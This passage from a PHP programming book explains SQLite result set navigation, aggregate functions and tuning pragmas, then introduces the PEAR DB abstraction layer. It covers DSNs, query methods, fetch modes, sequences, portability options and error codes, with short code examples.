To see more clearly how the iterator works internally, you can also do it manually (without foreach doing all the magic), as is shown here in the second part of the script:

    $details_query = "
        SELECT document_id, substr(doc.body, position - 20, 100)
        FROM dictionary d, lookup l, document doc
        WHERE d.id = l.word_id
            AND word in ('$words')
            AND document_id IN ($doc_ids)
            AND document_id = doc.id
        GROUP BY document_id, doc.body
    ";
    $result = $db->unbufferedQuery($details_query, SQLITE_NUM);
    while ($result->valid()) {
        $record = $result->current();
        $list[$record[0]] = $record[1];
        $result->next();
    }
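The relationship between foreach and the manual valid()/current()/next() loop can be checked with PHP's built-in Iterator interface alone. The sketch below uses a hypothetical ArrayResult class as a stand-in for a buffered result set; it is not part of the SQLite extension, and the sample rows are invented.

```php
<?php
// Hypothetical stand-in for a buffered result set; not an SQLite class.
class ArrayResult implements Iterator
{
    private $rows;
    private $pos = 0;

    public function __construct(array $rows)
    {
        $this->rows = array_values($rows);
    }

    // The attribute lines below are plain comments before PHP 8 and
    // silence return-type deprecation notices on PHP 8.1 and later.
    #[\ReturnTypeWillChange]
    public function rewind() { $this->pos = 0; }
    #[\ReturnTypeWillChange]
    public function valid() { return $this->pos < count($this->rows); }
    #[\ReturnTypeWillChange]
    public function current() { return $this->rows[$this->pos]; }
    #[\ReturnTypeWillChange]
    public function key() { return $this->pos; }
    #[\ReturnTypeWillChange]
    public function next() { $this->pos++; }
}

$result = new ArrayResult(array(array(7, 'first'), array(9, 'second')));

// What foreach does for us ...
$via_foreach = array();
foreach ($result as $row) {
    $via_foreach[$row[0]] = $row[1];
}

// ... and the same traversal spelled out by hand.
$manual = array();
$result->rewind();
while ($result->valid()) {
    $row = $result->current();
    $manual[$row[0]] = $row[1];
    $result->next();
}

var_dump($via_foreach === $manual);
```

The explicit rewind() is needed here only because the object was already traversed once; an unbuffered SQLite result cannot be rewound, which is why the script's manual loop starts directly with valid().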

By default, $result points to the first row when iterating, and the current() method returns the current record (indexed in the way indicated by the second parameter to unbufferedQuery()). With the next() method, you can advance to the next record in the result set. There are a few more methods that you can use; the next table shows which ones, and also lists the procedural functions for them. The first parameter to the procedural interface functions is always the result handle, and this one is not listed in Table 6.12.

Table 6.12 Result Set Navigation Functions and Methods

| Method Name | Description |
|---|---|
| $result->seek() / sqlite_seek() | Seeks to a row in the result set. The only parameter is the zero-based record number in the set. This function can only be used for buffered result sets. |
| $result->rewind() / sqlite_rewind() | Rewinds the result pointer to the first record in the result set. This function can only be used for buffered result sets. |
| $result->next() / sqlite_next() | Advances to the next record in the result set. |
| $result->prev() / sqlite_prev() | Moves the result pointer back to the previous record in the result set. This function can only be used for buffered result sets. |
| $result->valid() / sqlite_valid() / sqlite_has_more() | Returns whether more records are available in the result set. |
| $result->hasPrev() / sqlite_has_prev() | Returns whether a previous record is available. This function cannot be used in unbuffered queries. |

Only the last part of our search script remains, the part where we actually output the results:

    foreach ($rank as $record) {
        echo $record[0], "\n====\n...",
            $list[$record[0]], "...\n---------\n";
    }
    ?>

Here, we just reiterate over our first query result and use the message ID as key to the result set to display the relevant parts of the emails found.

6.3.3.11 Other Result Set-Related Functions

You can use a few other functions and methods on result sets.
The method numFields() (sqlite_num_fields()) returns the number of fields in the result set, and the method fieldName() (sqlite_field_name()) returns the name of the field. The only parameter to this method is the zero-based index of the field in the result set. If you do make a join between multiple tables, notice that this function returns the name of the field “as-is” from the query; for example, if the query contains "SELECT a.field1 FROM address a", the name of the field that is returned will be "a.field1".

Another peculiarity with column names, which is also valid for keys in returned arrays with the SQLITE_ASSOC option set, is that they are always returned in the same case as they were created in the "CREATE TABLE" statement. By setting the sqlite.assoc_case option in php.ini to 1, you force the SQLite extension to return uppercase column names. By setting it to 2, you force the extension to return lowercase column names. A setting of 0 (the default) does not touch the case of column names at all.

The method numRows() (sqlite_num_rows()) returns the number of records in the result set, but only works for buffered queries.

6.3.3.12 Aggregate User Defined Functions

Besides normal UDFs similar to those we used to generate our index from a trigger, it is also possible to define a UDF for aggregation functions. In the following example, we calculate the average length of the words in our dictionary:
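The two callbacks registered under the names average_length_step and average_length_finalize could look roughly like the sketch below. It assumes the callback convention of the SQLite extension as we understand it: the step function receives a context variable by reference plus the column value, and the finalize function receives the same context and returns the result. The function bodies and the sample words are assumptions; the loop at the end only simulates what the engine would do, so the sketch runs without a database.

```php
<?php
// Called once per row; $context persists between calls of one aggregate.
function average_length_step(&$context, $string)
{
    if (!is_array($context)) {
        $context = array('count' => 0, 'length' => 0);
    }
    $context['count']++;
    $context['length'] += strlen($string);
}

// Called once after the last row; its return value is the SQL result.
function average_length_finalize(&$context)
{
    if (!is_array($context) || $context['count'] == 0) {
        return "No words.";
    }
    return sprintf(
        "Average over %d words is %.3f chars.",
        $context['count'],
        $context['length'] / $context['count']
    );
}

// Simulate the engine for three rows of sample data.
$context = null;
foreach (array('php', 'sqlite', 'pear') as $word) {
    average_length_step($context, $word);
}
$summary = average_length_finalize($context);
echo $summary, "\n";
```

Keeping only a running count and a running total in the context means the aggregate never has to hold the whole column in memory.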

    $db->createAggregate(
        'average_length',
        'average_length_step',
        'average_length_finalize'
    );

The createAggregate() method creates our aggregate function. The first parameter is the name of the function that can be used from SQL queries; the second one is the function that is executed for each record (also called step); and the third parameter is the name of the function that is run when all records are selected.

    $avg = $db->singleQuery(
        "SELECT average_length(word) FROM dictionary");
    echo "$avg\n";
    ?>

Here, we simply execute the query using our newly defined function and echo the result, which should look something like this:

    Average over 28089 words is 10.038 chars.

6.3.3.13 Character Encoding

SQLite has support for two character sets: ISO-8859-1, which is the default and used for most western-European languages, and UTF-8. To enable UTF-8 mode, you need to tell the PHP ./configure command to do so. The switch to use SQLite's UTF-8 mode is --enable-sqlite-utf8. This option only affects sorting results.

6.3.3.14 Tuning

We already saw that you can speed up large amounts of inserts by encapsulating the queries into a transaction. But there are a few more tricks that we can do. Usually, when inserting a lot of data into the database, we're not interested in how many changes there were in the result set. SQLite allows you to turn off the counting of changes, which improves speed during insertion. You can instruct SQLite not to count changes by running the following SQL query:

    PRAGMA count_changes = 0

For example, with

    $db->query("PRAGMA count_changes = 0");

Another trick is to change the way SQLite flushes data to disk. With the synchronous pragma, you can switch between the following modes, as shown in Table 6.13.

Table 6.13 “PRAGMA Synchronous” Options

| Mode | Description |
|---|---|
| OFF | SQLite will not flush written data to disk at all; it's up to the operating system to handle this. |
| ON/NORMAL (default) | In this mode, SQLite will make sure the data is committed to disk by issuing the fsync() system call once in a while. |
| FULL | SQLite will now issue extra fsync()s to reduce the risk of corruption of the data in case of a power loss. |
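Put together, the insert-related tuning steps amount to a short sequence of statements around the actual inserts. The sketch below only builds that sequence as strings so that it can be run and inspected without a database. The helper names quote_word() and bulk_load_statements() are hypothetical, and quote_word() is a simplified stand-in for sqlite_escape_string(). Note that switching synchronous to OFF trades safety for speed, as Table 6.13 indicates.

```php
<?php
// Simplified stand-in for sqlite_escape_string(); an assumption for
// illustration that doubles single quotes and wraps the value in quotes.
function quote_word($word)
{
    return "'" . str_replace("'", "''", $word) . "'";
}

// Hypothetical helper: the statements for one tuned bulk insert.
function bulk_load_statements(array $words)
{
    $sql = array(
        "PRAGMA count_changes = 0",   // do not count changed rows
        "PRAGMA synchronous = OFF",   // leave flushing to the operating system
        "BEGIN TRANSACTION",          // one transaction around all inserts
    );
    foreach ($words as $word) {
        $sql[] = "INSERT INTO dictionary(word) VALUES(" . quote_word($word) . ")";
    }
    $sql[] = "COMMIT";
    return $sql;
}

$statements = bulk_load_statements(array('alpha', "it's"));
foreach ($statements as $statement) {
    echo $statement, ";\n";
    // With an open connection, each one would be run with $db->query($statement).
}
```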

In situations where there are a lot of reads from the SQLite database, it might be worthwhile to increase the cache size. Where the default is 2,000 pages (a page is 1,536 bytes), you can increase this size with the following query:

    PRAGMA cache_size=5000;

This setting only has effect for the current session, and the value will be lost when the connection to the database is broken. If you want to persist this setting, you need to use the default_cache_size pragma instead of just cache_size.

6.3.3.15 Other Tricks

There are still a few things untold about SQLite, for example, how to query the database structure. The answer is easy: use the following query:

    SELECT * FROM sqlite_master

This returns one element per database object (table, index, and trigger) with the following information: type of object, the name of the object, the table to which the object is linked (only useful for indexes and triggers), an ID, and the SQL DDL query to create the object. When executed on our example, the result is shown in Table 6.14.

Table 6.14 sqlite_master Table Dump

| Type | Name | Table | ID | SQL DDL |
|---|---|---|---|---|
| table | document | document | 3 | CREATE TABLE document ( id INTEGER PRIMARY KEY, title, intro, body ) |
| table | dictionary | dictionary | 4 | CREATE TABLE dictionary ( id INTEGER PRIMARY KEY, word ) |
| table | lookup | lookup | 5 | CREATE TABLE lookup ( document_id INTEGER, word_id INTEGER, position INTEGER ) |
| index | word | dictionary | 6 | CREATE UNIQUE INDEX word ON dictionary(word) |
| trigger | index_new | document | 0 | CREATE TRIGGER index_new AFTER INSERT ON document BEGIN SELECT php_index(new.id, new.title, new.intro, new.body); END |

The last thing to discuss is views, an SQL feature to simplify user-land queries. For example, if we want to create a view called "document_id_body" that contains only the id and body fields of the document table, we can execute the following query:

    CREATE VIEW document_id_body AS SELECT id, body FROM document;

After the view is created, you can use it in SQL queries just as if it were a real table. For example, the following query uses the view to return the ID and body fields of the first two records of our document table:

    SELECT * FROM document_id_body LIMIT 2;

Of course, in this case, it doesn't really make sense to create a view on one table only, but it does make sense to create a view over a complex query that joins multiple tables. Another original idea of views was that you can assign permissions to specific views as though they were tables, but that doesn't make sense with SQLite, which doesn't know anything about permissions except for permissions on the file system where the database file resides.

6.3.3.16 Words of Wisdom

Finally, here are some words of wisdom from the author of the SQLite engine, which he uses instead of a copyright notice:

☞ May you do good and not evil.
☞ May you find forgiveness for yourself and forgive others.
☞ May you share freely, never taking more than you give.

D. Richard Hipp

6.4 PEAR DB

The most commonly used PEAR package for database access is PEAR DB. DB is a database abstraction layer that provides a single API for querying most of the databases supported by PHP, as well as some more database-specific things in a portable way, such as sequences and error handling. PEAR DB itself is written in PHP, and has drivers for most of PHP's database extensions.

In this section, you learn how to use PEAR DB, and when it makes sense to use PEAR DB instead of using one of PHP's database extensions natively.

6.4.1 Obtaining PEAR DB

To install PEAR DB, you need the PEAR Installer that is installed along with PHP. Use the following command:

    $ pear install DB

If you have problems, see Chapter 10, “Using PEAR.”

6.4.2 Pros and Cons of Database Abstraction

The two main advantages of using a database abstraction layer such as PEAR DB are

☞ A single API is easy to remember. You are more productive when you spend less time looking up the documentation.
☞ A single API allows other components to use the DB API for generic DBMS access, without worrying about back-end specifics.

Because DB is implemented in PHP, these advantages come at a cost:

☞ A layer written in PHP is slower than using built-in PHP functions, especially if running without an opcode cache.
☞ The extra layer of code adds complexity and potential error sources.

Deciding the right choice for you depends on your needs. Requirements that speak for using PEAR DB or another form of abstracted DBMS access are portability, reusability, rapid development, or that you already use other PEAR packages.

Some requirements that speak against using PEAR DB are high performance requirements where the database itself would not be the bottleneck, a significant buy-in with some specific DBMS product, or a policy of avoiding external dependencies.

6.4.3 Which Features Are Abstracted?

DB does not abstract everything, such as SQL or database schema grammar. The features it does abstract are

☞ Database connections
☞ Fetching results
☞ Binding input variables (prepare/execute)
☞ Error reporting
☞ Sequences
☞ Simple database and table descriptions
☞ Minor quirks and differences

The following are not abstracted, either because they are outside the scope of DB, too expensive, or simply not yet implemented:

☞ SQL syntax
☞ Database schemas (CREATE TABLE, for example)
☞ Field types
☞ Character encodings
☞ Privilege management (GRANT, and so on)

Database schemas and field types are abstracted by the MDB package, which is another database abstraction layer found in PEAR. MDB is a merge of Metabase and DB, two of the most popular database abstraction layers for PHP. The intent behind MDB has been to merge with the next major DB release.

6.4.4 Database Connections

PEAR DB borrows the term data source name (DSN) from ODBC to describe how a database is addressed.

6.4.4.1 Data Source Names

DSNs use the uniform resource identifier (URI) format. This is an example DSN that refers to a mysql database on localhost called "world":

    mysql://user:password@host/world

The full DSN format is a lot more verbose than this, and most fields are optional. In fact, only the database extension name is mandatory for all drivers. The database extension determines which DB driver is used, and which other DSN fields are required depends on the driver.

These are some example DSNs:

    dbext
    dbext://host
    dbext://host/database
    dbext://user:pw@host/database
    dbext://user:pw@host
    dbext(dbtype)://user:pw@protocol+host:port//db/file.db?mode=x

dbext is the database back-end driver. The drivers bundled with DB are dbase, fbsql, ibase, ifx, msql, mssql, mysql, mysqli, oci8, odbc, pgsql, sqlite, and sybase. It is possible to install additional drivers as separate packages.

The syntax of the DSN URI is the same for all drivers, but which fields are required varies depending on the back-end database's features. This section uses mysql for examples. Consult the PEAR DB online manual for DSN details.

6.4.4.2 Establishing Connections

Here is an example of how to establish a database connection using PEAR DB:

    <?php
    require_once 'DB.php';

    $dbh = DB::connect("mysql://test@localhost/test");
    if (DB::isError($dbh)) {
        print $dbh->getMessage() . "\n";
        print "Error details: " . $dbh->getUserInfo() . "\n";
        exit(1);
    }
    print "Connect ok!\n";

This script connects to the "test" database using the mysql extension. The database server runs on localhost, and the connection will be opened as user "test" with no password.

DB.php is the only file you need to include to use PEAR DB. DB::connect() is a factory method that includes the right file for your driver. It creates a driver object, initializes it, and calls the native function for creating the actual connection. DB::connect() will raise a PEAR error on failure.

For SQLite databases, all you need to specify is the PHP extension and the database file, like this:

    sqlite:///test.db

Here, "test.db" will be opened from the current directory. To specify the full path, the database file name must be prefixed with yet another slash, like this:

    sqlite:////var/lib/sqlite/test.db

6.4.4.3 Configuration Options

You can configure some of the DB behavior per connection with the setOption() method. Options are parameters that are less frequently used than the ones used in the DB::connect() factory method:

    $dbh->setOption("autofree", true);

Each option has a name and a value. The value may be of any type, but the currently implemented options exclusively use string and integer values.

Most configuration options may be changed at any time, except for the ones that affect the database connection (persistent and ssl).

The options supported by DB are the following:

☞ persistent. (Boolean) Whether DB uses a persistent connection to the backend DBMS.
☞ ssl. (Boolean) Whether to use SSL (secure sockets layer) connections to the database (may not be available).
☞ debug. (integer) For adjusting debug information. 0 means no debug info, and 1 means some debug info.
☞ seqname_format. (string) Table or sequence name format used by emulated DB sequences. *printf-style format string, where %s is substituted by the DB sequence name. Defaults to %s_seq. Changing this option after populating your database may completely break your application, so be careful!
☞ autofree. (Boolean) Whether to automatically free result sets after queries are finished (instead of PHP doing it at the end of the request if you forget to do it yourself).
☞ portability. (integer) Bitmap telling what features DB should emulate for inter-DBMS portability; see the “Portability Features” section later in this chapter for more details.
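The warning attached to seqname_format is easier to appreciate with the name substitution written out. The following minimal sketch uses plain sprintf(), which is how this chapter describes the sequence table name being derived; the sequence name "foo" and the custom format are assumptions for illustration.

```php
<?php
// Default format according to the option list above.
$default_format = '%s_seq';
// A custom format; the "app_" prefix is purely illustrative.
$custom_format = 'app_%s_sequence';

$seqname = 'foo';
$default_name = sprintf($default_format, $seqname);
$custom_name = sprintf($custom_format, $seqname);

echo "default: $default_name\n";
echo "custom:  $custom_name\n";
```

A database populated under the default format holds its counter under the first name; after the option is changed, DB would look for the second name instead and would not find the existing counter.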

6.4.5 Executing Queries

There are four ways of running queries with PEAR DB. All are performed by calling different methods in the connection object: query(), limitQuery(), prepare()/execute(), or simpleQuery(). An explanation of each follows.

6.4.5.1 query($query, $params = array())

This is the default way of calling queries if you don't need to limit the number of results. If the result contains one or more rows, query() returns a result object; otherwise, it returns a Boolean indicating success.

Here is an example that returns results:

    <?php
    require_once 'DB.php';
    PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s<br />\n");
    $dbh = DB::connect("mysql://test@localhost/world");
    $result = $dbh->query("SELECT Name FROM City WHERE " .
                          "CountryCode = 'NOR'");
    while ($result->fetchInto($row)) {
        print "$row[0]<br />\n";
    }

This example uses the "world" MySQL database referenced in the previous section.

Here, the query() method returns a DB_result object. DB_result's fetchInto() method retrieves a row of results and stores it in the $row array. When the last row has been read, fetchInto() returns null. Continue reading for more details about fetchInto() and the other fetch methods.

The query() method also accepts an additional parameter for passing input parameters to the query:

    <?php
    require_once 'DB.php';
    PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s<br />\n");
    $dbh = DB::connect("mysql://test@localhost/world");
    $code = 'NOR';
    $result = $dbh->query(
        "SELECT Name FROM City WHERE CountryCode = ?", $code);
    while ($result->fetchInto($row)) {
        print "$row[0]<br />\n";
    }

This example does exactly the same thing as the previous one, except it uses prepare/execute or bind if the database supports it. The other advantage of passing input parameters like this is that you need not worry about quoting. DB automatically quotes your parameters for you as necessary.

6.4.5.2 limitQuery($query, $from, $count, $params = array())

This method is almost identical to query(), except that it takes a "from" and "count" parameter that limits the result set to a specific offset range. Here's an example:

    <?php
    require_once 'DB.php';
    [...]
    PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s<br />\n");
    $dbh = DB::connect("mysql://test@localhost/world");
    $result = $dbh->limitQuery("SELECT Name, Population FROM City ".
                               "ORDER BY Population", $from, $show);
    while ($result->fetchInto($row)) {
        print "$row[0] ($row[1])<br />\n";
    }

The limitQuery() method ensures that the first result is at offset $from (starting at 0), and no more than $show results are returned.

6.4.5.3 prepare($query) and execute($sth, $data = array())

The third way of running queries is to use the prepare() and execute() methods.

The prepare() method will parse the query and extract input parameter placeholders. If the back-end database supports either input parameter binding or the prepare/execute paradigm, the appropriate native calls are done to prepare the query for execution.

Next, the execute() method takes a prepared query along with input parameters, sends the parameters to the database, executes the query, and returns either a Boolean or a DB_result object, just like the other querying methods.

You may call execute() many times for each prepared query. By using prepare/execute (for example) in a loop with many INSERT queries, you may save yourself from a lot of query parsing overhead, because the database has already parsed the query and just needs to execute it with new data.

You can use prepare() and execute() regardless of whether the back-end database supports this feature. DB emulates as necessary by building and executing a new query for each execute() call.

Here is an example that updates the world database numbers with official numbers for Norway as of January 1, 2004:

    <?php
    require_once 'DB.php';
    [...]
    PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s<br />\n");
    $dbh = DB::connect("mysql://test@localhost/world");
    $sth = $dbh->prepare("UPDATE City SET Population = ? " .
                         "WHERE Name = ? AND CountryCode = ?");
    foreach ($changes as $data) {
        $dbh->execute($sth, $data);
        printf("%s: %d row(s) changed<br />\n",
               $data[1], $dbh->affectedRows());
    }

Here, the query is prepared once, and $sth contains a reference (integer or resource, depending on the driver) to the prepared query. Then the prepared query is executed once for each UPDATE statement.

This example also demonstrates the affectedRows() call, which returns the number of rows with different content after the execute() call.

6.4.5.4 simpleQuery($query)

This method is meant for data-manipulation queries that do not return any results beyond success or failure. Its only purpose is that it has slightly less overhead. It returns a Boolean that indicates success or a PEAR error on failure. Here's an example:

    $dbh->simpleQuery("CREATE TABLE foobar (foo INT, bar INT)");

Nothing stops you from running SELECTs and other queries returning data with simpleQuery(), but the return value will be a database extension-specific resource handle. Do not use simpleQuery() for SELECTs.

6.4.6 Fetching Results

The DB_result class has two methods for fetching results and three ways of representing a row of data.

6.4.6.1 Fetch Modes

As with most native database extensions, DB offers different ways of representing a row of data:

☞ DB_FETCHMODE_ORDERED, returning a numerically indexed array, like this:

    array( 0 => first column,
           1 => second column,
           2 => third column, ... )

☞ DB_FETCHMODE_ASSOC, returning an associative array with column names as keys:

    array( "ID"          => first column,
           "Name"        => second column,
           "CountryCode" => third column, ... )

☞ DB_FETCHMODE_OBJECT, returning an object with public member variables named after column names.

The default fetch mode is DB_FETCHMODE_ORDERED.
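The three row representations can be compared side by side without a database. The sketch below builds them by hand for one row; the column names follow the ones used in the fetch mode list, the values are sample data, and the plain PHP constructs shown here only mimic the shapes that the fetch modes produce, not how DB builds them.

```php
<?php
// One row of the City table, written out by hand; values are sample data.
$columns = array('ID', 'Name', 'CountryCode');
$values = array(1, 'Oslo', 'NOR');

$ordered = $values;                          // shape of DB_FETCHMODE_ORDERED
$assoc = array_combine($columns, $values);   // shape of DB_FETCHMODE_ASSOC
$object = (object) $assoc;                   // shape of DB_FETCHMODE_OBJECT

// The same column, reached three different ways.
echo $ordered[1], "\n";
echo $assoc['Name'], "\n";
echo $object->Name, "\n";
```

The ordered form is the most compact but ties the calling code to the column order of the query, whereas the associative and object forms survive a reordered SELECT list.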

6.4.6.2 Configuring Fetch Modes

You may change the default fetch mode by calling the setFetchMode() method in the connection object, like this:

    $dbh->setFetchMode(DB_FETCHMODE_ASSOC);

This fetch mode then applies to any queries executed by this connection object.

You may also override the default fetch mode per query with an extra parameter to the fetch methods, like this:

    $row = $result->fetchRow(DB_FETCHMODE_OBJECT);
    // or like this:
    $result->fetchInto($row, DB_FETCHMODE_ASSOC);

6.4.6.3 fetchRow($fetchmode = DB_FETCHMODE_ORDERED, $row = 0)

fetchRow() returns the array or object with row data on success, NULL when reaching the end of the result set, or a DB error object.

6.4.6.4 fetchInto(&$arr, $fetchmode = DB_FETCHMODE_ORDERED, $row = 0)

fetchInto() returns DB_OK and stores the row data in $arr when a row was successfully retrieved, returns NULL when reaching the end of the result set, or returns a DB error object. As it happens, DB_OK evaluates to true and NULL evaluates to false. Provided you have an error handler set up, you can then write a loop, like this:

    while ($result->fetchInto($row)) {
        // ... do something
    }

In general, it is always better to use fetchInto(). It makes looping over results easier and slightly faster because fetchRow() is really just a wrapper around fetchInto().

6.4.6.5 Using Your Own Result Class

By default, the object fetch mode (DB_FETCHMODE_OBJECT) returns a stdClass object.

If you configure the fetch mode using the DB::setFetchMode() method rather than specifying the fetch mode in the fetch call, you can add an extra parameter to specify the class to use for the returned object.

The only interface requirement is that the constructor must accept a single array parameter. The array passed to the constructor will have the row data indexed by column name.
You can configure your own class only when controlling the fetch mode with DB::setFetchMode(). Here is an example that uses a class implementing a getter method to access row data:

    <?php
    require_once 'DB.php';

    class MyResultClass {
        public $row_data;
        function __construct($data) {
            $this->row_data = $data;
        }
        function __get($variable) {
            return $this->row_data[$variable];
        }
    }

    PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s<br />\n");
    $dbh = DB::connect("mysql://test@localhost/world");
    $dbh->setFetchMode(DB_FETCHMODE_OBJECT, "MyResultClass");
    $code = 'NOR';
    $result = $dbh->query(
        "SELECT Name FROM City WHERE CountryCode = ?", $code);
    while ($row = $result->fetchRow()) {
        print $row->Name . "<br />\n";
    }

6.4.7 Sequences

Database sequences are tricky portabilitywise because they are part of the SQL grammar in some databases, such as Oracle, or implemented as INSERT side effects, such as MySQL's AUTO_INCREMENT feature. The different ways of handling sequences cannot be mixed easily. To provide a single API, DB offers a third way to deal with sequences, which is different from both of these, but at least works for any database supported by DB:

    <?php
    require_once 'DB.php';
    PEAR::setErrorHandling(PEAR_ERROR_DIE, "%s<br />\n");
    $dbh = DB::connect("mysql://test@localhost/world");
    $dbh->query("CREATE TABLE foo (myid INTEGER)");
    $next = $dbh->nextId("foo");
    $dbh->query("INSERT INTO foo VALUES(?)", $next);
    $next = $dbh->nextId("foo");
    $dbh->query("INSERT INTO foo VALUES(?)", $next);
    $next = $dbh->nextId("foo");
    $dbh->query("INSERT INTO foo VALUES(?)", $next);
    $result = $dbh->query("SELECT * FROM foo");
    while ($result->fetchInto($row)) {
        print "$row[0]<br />\n";
    }
    $dbh->query("DROP TABLE foo");
    #$dbh->dropSequence("foo");

The paradigm is not to use auto-increments, last-insert-id calls, or even "sequencename.nextid" as part of the query. Instead, you must call a driver function to generate a new sequence number for the specific sequence that you then use in your query. The sequence number generation is still atomic.

The only disadvantage with this approach is that you depend on PHP code (DB) to make the right sequences for you. This means that if you need to obtain sequence numbers from non-PHP code, this code must mimic PHP's behavior.

This example displays three lines with "1", "2", and "3". Running this script repeatedly will not restart the output at 1, but continue with "4" and so on. (If you uncomment the last line with the dropSequence() call, the sequence will be reset and the output will start with "1".)

The methods for dealing with sequences are the following:

nextId($seqname, $create = true). nextId() returns the next sequence number for $seqname. If the sequence does not exist, it will be created if $create is true (the default value).

createSequence($seqname). Creates a sequence or a sequence table for databases that do not support real sequences. The table name is the result of sprintf($dbh->getOption("seqname_format"), $seqname).

dropSequence($seqname). Removes the sequence or sequence table. Subsequent calls to nextId() for the same $seqname will re-create and reset the sequence.

6.4.8 Portability Features

Portability in PEAR DB is a balance between performance and portability. Different users have different needs, so from DB 1.6, you have the option of enabling or disabling specific portability features. Older versions of DB had a catch-all “optimize for speed” or “optimize for portability” setting that is deprecated and not covered here.
Portability features are controlled with the portability configuration option (see “Configuration Options” earlier in this chapter). To combine more than one feature, use a bitwise OR, such as this:

    $dbh->setOption("portability",
        DB_PORTABILITY_RTRIM | DB_PORTABILITY_LOWERCASE);

6.4.8.1 Count Deleted Rows

Option: DB_PORTABILITY_DELETE_COUNT

Some DBMSs, such as MySQL and SQLite, store tables in a single file, and deleting all the rows in the table is simply a matter of truncating the file. This is fast, but you will not know how many rows were deleted. This option fixes that, but makes such deletes slower. In MySQL 4, this has been fixed so you do not need this option if you use MySQL 4.0 or newer.

6.4.8.2 Count Number of Rows

Option: DB_PORTABILITY_NUMROWS

When working with Oracle, you will not know how many rows a SELECT returns without either doing a COUNT query or fetching all the rows. This option ensures that the $result->numRows() method always returns the number of rows in the result set. This is not needed for drivers other than Oracle (oci8).

6.4.8.3 Lowercasing

Option: DB_PORTABILITY_LOWERCASE

Field name case (upper- or lowercasing letters) varies between DBMSs. Some leave the case exactly the way it was in the CREATE TABLE statement, some uppercase everything, and some are case-insensitive and others not. This option always lowercases column names when fetching results.

6.4.8.4 Trimming Data

Option: DB_PORTABILITY_RTRIM

Some DBMSs keep whitespace padding from CHAR fields, while others strip it off. This option makes sure there is no trailing whitespace in the result data.

6.4.8.5 Empty String Handling

Option: DB_PORTABILITY_NULL_TO_EMPTY

Oracle does not distinguish between NULL and '' (the empty string) when inserting text fields. If you fetch a row into which you just inserted an empty string, that field will end up as NULL. This option helps make this consistent by always converting NULL results to empty strings.

6.4.8.6 Really Portable Errors!

Option: DB_PORTABILITY_ERRORS

This option should not have been necessary, but some error codes have been incorrectly mapped in older versions and changing the mapping would break compatibility. This option breaks backward compatibility, but fixes the error mappings so they are consistent across all drivers. If you truly want portable errors (why wouldn’t you?), use this option.

To enable all the portability features, use DB_PORTABILITY_ALL.

6.4.9 Abstracted Errors

Knowing how to deal with or recover from an error is an important part of any application.
When dealing with different DBMS servers, you will discover that they report different errors for the same issue, even if you are using ODBC. To compensate for this and make it possible to write portable PHP scripts that can handle errors gracefully, DB uses its own set of error codes to represent errors in an abstracted yet simple way.

6.4.9.1 DB Error Codes

Each database driver converts the error codes or error messages from the DBMS to a DB error code. These codes are represented as PHP constants. The following list contains the supported error codes and examples of situations that cause them:

☞ DB_ERROR_ACCESS_VIOLATION. Missing privileges for a table, no read access to file referenced by opaque parameters, or bad username or password.
☞ DB_ERROR_ALREADY_EXISTS. Table, sequence, procedure, view, trigger, or some other condition already exists.
☞ DB_ERROR_CANNOT_CREATE. Cannot create table or file; the cause of the problem is outside the DBMS.
☞ DB_ERROR_CANNOT_DROP. Cannot drop table or delete file; the cause of the problem is outside the DBMS.
☞ DB_ERROR_CONNECT_FAILED. Could not establish database connection.
☞ DB_ERROR_CONSTRAINT. Foreign key does not exist, row contains foreign key referenced by another table, or field constraints violated.
☞ DB_ERROR_CONSTRAINT_NOT_NULL. Field may not be NULL.
☞ DB_ERROR_DIVZERO. Division by zero error.
☞ DB_ERROR_INVALID. Catch-all "invalid input" error.
☞ DB_ERROR_INVALID_DATE. Bad date format or nonsensical date.
☞ DB_ERROR_INVALID_NUMBER. Trying to use a non-number in a number field.
☞ DB_ERROR_MISMATCH. Number of parameters does not match up (also prepare/execute).
☞ DB_ERROR_NODBSELECTED. Database connection has no database selected.
☞ DB_ERROR_NOSUCHDB. Trying to access a non-existing database.
☞ DB_ERROR_NOSUCHFIELD. Trying to query a non-existing column.
☞ DB_ERROR_NOSUCHTABLE. Trying to query a non-existing table.
☞ DB_ERROR_NOT_CAPABLE. Database back-end cannot do that.
☞ DB_ERROR_NOT_FOUND. Trying to drop a non-existing index.
☞ DB_ERROR_NOT_LOCKED. Trying to unlock something that is not locked.
☞ DB_ERROR_SYNTAX. SQL syntax error.
☞ DB_ERROR_TRUNCATED. Returned data was truncated.
☞ DB_ERROR_UNSUPPORTED. Performing an operation not supported by DB or the DBMS client.
☞ DB_ERROR_VALUE_COUNT_ON_ROW. See DB_ERROR_MISMATCH.

6.4.9.2 Graceful Error Handling

DB uses PEAR errors to report errors.
Here is an example that alerts the user on an attempt to add the same unique combination of keys twice:

    <?php
    require_once 'DB.php';

    // DSN as used in the earlier examples in this chapter
    $dbh = DB::connect("mysql://test@localhost/world");
    $dbh->setOption('portability', DB_PORTABILITY_ERRORS);
    $dbh->query("CREATE TABLE mypets (name CHAR(15), species CHAR(15))");
    $dbh->query("CREATE UNIQUE INDEX mypets_idx ON mypets (name, species)");
    $data = array('Bill', 'Mule');
    for ($i = 0; $i < 2; $i++) {
        $result = $dbh->query("INSERT INTO mypets VALUES(?, ?)", $data);
        if (DB::isError($result) && $result->getCode() == DB_ERROR_CONSTRAINT) {
            print "Already have a $data[1] called $data[0]!<br />\n";
        }
    }
    $dbh->query("DROP TABLE mypets");

See Chapter 7, “Error Handling,” for details on how to catch PEAR errors.

6.4.10 Convenience Methods

Although PEAR DB is mostly a common API, it also contains some convenience features for retrieving all the data from a query easily. All these methods support prepare/execute style queries, and all of them return PEAR errors on failure.

6.4.10.1 $dbh->getOne($query, $params = array())

The getOne() method returns the first column from the first row of data. Use the $params parameter if $query contains placeholders (this applies to the rest of the convenience functions, too). Here’s an example:

    $name = $dbh->getOne('SELECT name FROM users WHERE id = ?',
                         array($_GET['userid']));

6.4.10.2 $dbh->getRow($query, $params = array(), $fetchmode = DB_FETCHMODE_DEFAULT)

The getRow() method returns an array with the first row of data. It will use the default fetch mode, defaulting to ordered. Ordered data will start at index 0. Here’s an example:

    $data = $dbh->getRow('SELECT * FROM users WHERE id = ?',
                         array($_GET['userid']));

6.4.10.3 $dbh->getCol($query, $col = 0, $params = array())

The getCol() method returns an array with the $col'th element of each row. $col defaults to 0. Here’s an example:

    $userids = $dbh->getCol('SELECT id FROM users');

